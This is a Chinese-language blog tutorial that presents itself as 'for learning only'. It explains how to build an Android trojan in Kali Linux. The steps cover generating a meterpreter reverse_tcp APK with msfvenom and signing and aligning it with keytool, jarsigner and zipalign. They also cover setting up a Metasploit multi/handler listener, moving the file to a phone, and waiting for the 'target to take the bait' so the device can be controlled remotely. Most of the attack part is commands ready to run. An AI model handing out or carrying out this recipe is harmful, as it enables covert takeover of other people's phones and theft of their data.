kalilinux生成安卓木马(仅供学习使用)

一、前期准备工作

1.1虚拟机安装好kalilinux

链接:https://pan.baidu.com/s/10rcLYOGYKQb0pETqJLbD4A
提取码:p4dq

(本身是想要给你们网站的但是那个包我找不到在哪下载的了,不想要网盘的可以去清华镜像/阿里镜像找找看)

上述是kalilinux的光盘镜像。

1.1.1kalilinux的安装

这个过程有点复杂,我之后再发博客详细讲解下kalilinux的安装。

1.1.2安装之后

打开虚拟机输入——root用户,密码

进入root账户下的系统

1.1.3注意:

kalilinux2020版本之后系统默认没有root用户都是普通用户,但是可以获得临时权限。

1.1.4更改root用户密码来实现永久进入超级管理员的系统中来

①开机选择第二项,点击回车进入图二界面

在这里插入图片描述

在这里插入图片描述

②点击键盘上的“E",进入图三界面

在这里插入图片描述

③光标定位在图四的位置在“ro quiet splash”输入“init=/bin/bash”,并将“ro”修改成“rw"

在这里插入图片描述

④ 修改确认无误之后,按“F10”或者“Ctrl+C”“Ctrl+X”即可进入单用户模式(如图五所示)

在这里插入图片描述


**passwd 用户名,**这边修改的是root,所以输入“**passwd root”,**然后回车就可以输入新密码了,一共输入两次,密码不显示出来,输入完之后有,回车就完事了!

⑥重启即可

上述就是永久使用root用户的操作了,重启后用户名输入root,密码输入后登录就行了,后续操作就更加方便了。

2.1准备一台和电脑在同一局域网下的手机。(手机版本高于安卓8的话,想实现效果可以用电脑的安卓模拟器来实现,用linux来操作Windows电脑也行)

3.1下载xshell7

因为xshell6的破解版用不了了,必须使用xshell7才行,xshell7在各大软件商店均可下载。

二、进入正题

2.1进入kalilinux

鼠标右键打开终端

2.1.1获取当前系统所在局域网的ip地址

输入

$ifconfig

在这里插入图片描述

上图中 inet后面的就是本机目前linux系统的ip地址

我目前的ip地址是192.168.131.129

(读者可以看到自己的ip地址)

2.2创建木马

2.2.1输入下列命令:msfvenom -p android/meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555 R > /root/apk.apk

该命令会创建一个在根目录下的一个名为apk的apk文件。

其中的lhost是你的系统ip,lport是接口,在这里设置为5555。

在这里插入图片描述

2.3.为了木马的兼容性为其配置签名,并验证(我上述创建的是520.apk你们可以更改,我讲的是apk.apk)

2.3.1

keytool -genkey -V -keystore apk-trojan-key.keystore -alias apk -keyalg RSA -keysize 1024 -validity 999

输入上述命令之后

在这里插入图片描述

按照我的填写方式把每一步填好。

里面的密钥库口令自行设置!!!

2.3.2接下来

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore apk-trojan-key.keystore apk.apk apk

在这里插入图片描述

2.3.3验证证书

输入

jarsigner -verify -verbose apk.apk

在这里插入图片描述

到这步就成功一大半了

zipalign -v 4 520.apk aaaa.apk

2.3.4apt update——更新安装指令

等待更新结束。

2.3.5优化apk

在这里插入图片描述

先输入:apt install zipalign

再使用:zipalign -v 4 apk.apk aaaa.apk

结束后如图,优化成功。

2.4启动模块

2.4.1输入msfconsole

效果如图:

在这里插入图片描述

2.4.2加载模块

use exploit/multi/handler

2.4.3简略步骤了

set payload android/meterpreter/reverse_tcp //选择Payload

show options //查看参数设置

这个payload里边有两个参数要设置 LHOST和LPORT 表示地址和端口 默认的端口是4444

现在我们来更改设置:
1.set LHOST 192.168.131.129 //这里的地址设置成我们刚才生成木马的IP地址

2.set LPORT 5555 //这里的端口设置成刚才我们生成木马所监听的端口

3.exploit //开始执行漏洞 开始监听,等待手机上线

在这里插入图片描述

如图。

在这里插入图片描述

不要学我,我手快了,输错了几步。

2.5使用xshell7将木马传递给Windows再传给安卓。

在这里插入图片描述

利用xshell传文件

三、等待目标上钩

在这里我手机版本不对,但是电脑模拟器可以。

在这里插入图片描述

这表示目标上钩。

输入help可以查看你可以控制的操作。

在这里插入图片描述

到这步,试验成功。

总结,我的教学仅供大家学习使用,希望可以对kalilinux有一些心得。

Logo

为开发者提供学习成长、分享交流、生态实践、资源工具等服务,帮助开发者快速成长。

更多推荐